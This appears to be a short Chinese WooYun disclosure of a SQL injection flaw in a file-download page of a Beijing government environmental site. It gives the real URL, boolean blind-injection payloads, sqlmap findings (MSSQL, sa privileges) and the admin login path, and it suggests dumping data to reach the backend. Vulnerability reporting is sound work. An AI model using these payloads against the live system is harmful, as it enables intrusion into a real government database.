WooYun.org

猪肉点：
http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848
直接访问会提示下载文件。
http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848'and'a'='a
也会提示下载pdf

http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848'and'a'='aa
这样就显示空白。
应存在注入。
sqlmap结果如下：

数据库是mssql2008 数据库名为constructProject
数据库服务器也是win2008
由于是盲注 跑数据有点慢 暂时没跑
接着测试权限。发现是sa
但是站库分离 且数据库服务器无法上网，就未深入了。
不过后台在这
http://app2.bjepb.gov.cn/cpout/out/logon.aspx
慢慢跑出数据 再进入后台 然后应该是有戏的。